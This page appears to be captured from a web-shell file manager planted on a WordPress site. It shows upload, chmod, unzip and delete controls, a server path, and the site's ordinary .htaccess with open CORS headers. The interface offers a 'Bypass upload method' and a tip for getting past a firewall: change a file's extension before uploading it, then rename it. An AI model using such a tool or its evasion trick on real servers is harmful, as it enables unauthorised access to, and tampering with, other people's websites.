Failed to unzip file!
Close
Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
candid-dev.bitkit.dk
httpdocs
File Content:
.htaccess
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{REQUEST_URI} ^/search/?$ [NC] RewriteCond %{QUERY_STRING} ^s=.+$ RewriteRule ^ /index.php?pagename=search [L] </IfModule> # BEGIN WordPress # The directives (lines) between "BEGIN WordPress" and "END WordPress" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress <IfModule mod_headers.c> <FilesMatch "\.csv$"> Header set Access-Control-Allow-Origin "*" Header set Access-Control-Allow-Methods "GET, OPTIONS, POST, PUT" Header set Access-Control-Allow-Headers "Content-Type" </FilesMatch> <FilesMatch "\.json$"> Header set Access-Control-Allow-Origin "*" Header set Access-Control-Allow-Methods "GET, OPTIONS, POST, PUT" Header set Access-Control-Allow-Headers "Content-Type" </FilesMatch> # Handle preflight requests <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{REQUEST_METHOD} OPTIONS RewriteRule ^(.*)$ - [R=200,L] </IfModule> </IfModule>
Edit
Download
Unzip
Chmod
Delete